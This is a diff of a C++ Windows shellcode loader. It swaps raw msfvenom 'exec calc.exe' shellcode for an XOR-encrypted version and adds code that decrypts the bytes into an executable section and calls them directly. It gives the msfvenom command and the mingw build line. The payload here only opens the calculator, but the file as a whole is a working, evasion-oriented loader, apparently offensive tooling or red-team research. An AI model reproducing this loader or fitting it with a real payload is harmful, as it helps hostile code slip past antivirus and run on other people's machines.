@@ -1,31 +1,38 @@ |
|
|
// x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./section.S -o ./byorwx.exe |
|
|
#include <cstdint> |
|
|
|
|
|
unsigned char buf[] = |
|
|
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" |
|
|
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" |
|
|
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a" |
|
|
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" |
|
|
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" |
|
|
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48" |
|
|
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40" |
|
|
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" |
|
|
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41" |
|
|
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1" |
|
|
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c" |
|
|
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" |
|
|
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" |
|
|
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b" |
|
|
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" |
|
|
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" |
|
|
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd" |
|
|
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0" |
|
|
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff" |
|
|
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"; |
|
|
// x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./byorwx.S -o ./byorwx.exe |
|
|
|
|
|
extern unsigned char PAYLOAD[]; |
|
|
|
|
|
// msfvenom -p windows/x64/exec -f c CMD=calc.exe --encrypt xor --encrypt-key abcdef |
|
|
unsigned char buf[] = |
|
|
"\x9d\x2a\xe0\x80\x95\x8e\xa1\x62\x63\x64\x24\x37\x20\x32" |
|
|
"\x31\x35\x33\x2e\x50\xb0\x06\x2c\xee\x34\x01\x2a\xe8\x36" |
|
|
"\x7d\x2e\xea\x30\x43\x2c\xee\x14\x31\x2a\x6c\xd3\x2f\x2c" |
|
|
"\x2c\x53\xaa\x2c\x54\xa6\xcd\x5e\x02\x18\x67\x4a\x41\x23" |
|
|
"\xa2\xad\x68\x27\x60\xa3\x81\x89\x37\x27\x30\x2a\xe8\x36" |
|
|
"\x45\xed\x23\x5e\x2b\x65\xb5\xed\xe1\xea\x63\x64\x65\x2e" |
|
|
"\xe4\xa2\x17\x03\x2d\x67\xb1\x32\xe8\x2c\x7d\x22\xea\x22" |
|
|
"\x43\x2d\x64\xb6\x82\x34\x2b\x9b\xac\x27\xea\x56\xeb\x2c" |
|
|
"\x64\xb0\x2c\x53\xaa\x2c\x54\xa6\xcd\x23\xa2\xad\x68\x27" |
|
|
"\x60\xa3\x5b\x84\x10\x97\x2d\x61\x2f\x40\x6d\x23\x58\xb3" |
|
|
"\x16\xbc\x3d\x22\xea\x22\x47\x2d\x64\xb6\x07\x23\xe8\x68" |
|
|
"\x2d\x22\xea\x22\x7f\x2d\x64\xb6\x20\xe9\x67\xec\x2d\x67" |
|
|
"\xb1\x23\x3b\x25\x3d\x38\x38\x38\x22\x3c\x24\x3f\x20\x38" |
|
|
"\x2b\xe7\x89\x46\x20\x30\x9c\x84\x3d\x27\x38\x38\x2b\xef" |
|
|
"\x77\x8f\x36\x9d\x9c\x9b\x38\x2e\xdb\x63\x63\x64\x65\x66" |
|
|
"\x61\x62\x63\x2c\xe8\xeb\x60\x63\x63\x64\x24\xdc\x50\xe9" |
|
|
"\x0c\xe3\x9a\xb3\xda\x92\xd6\xc6\x33\x27\xdb\xc4\xf6\xd9" |
|
|
"\xf8\x99\xb4\x2a\xe0\xa0\x4d\x5a\x67\x1e\x69\xe4\x9e\x86" |
|
|
"\x14\x67\xd8\x23\x76\x14\x0e\x08\x63\x3d\x24\xef\xbb\x9d" |
|
|
"\xb6\x07\x04\x0a\x02\x4c\x06\x1c\x00\x66"; |
|
|
unsigned char key[] = {'a','b','c','d','e','f'}; |
|
|
|
|
|
int main() { |
|
|
__builtin_memcpy(PAYLOAD, buf, sizeof(buf)); |
|
|
for (size_t i = 0; i < sizeof(buf); ++i) { |
|
|
PAYLOAD[i] = PAYLOAD[i] ^ key[i % sizeof(key)]; |
|
|
} |
|
|
const auto exec_buf = reinterpret_cast<void (*)()>(PAYLOAD); |
|
|
exec_buf(); |
|
|
return 0; |
|
|
|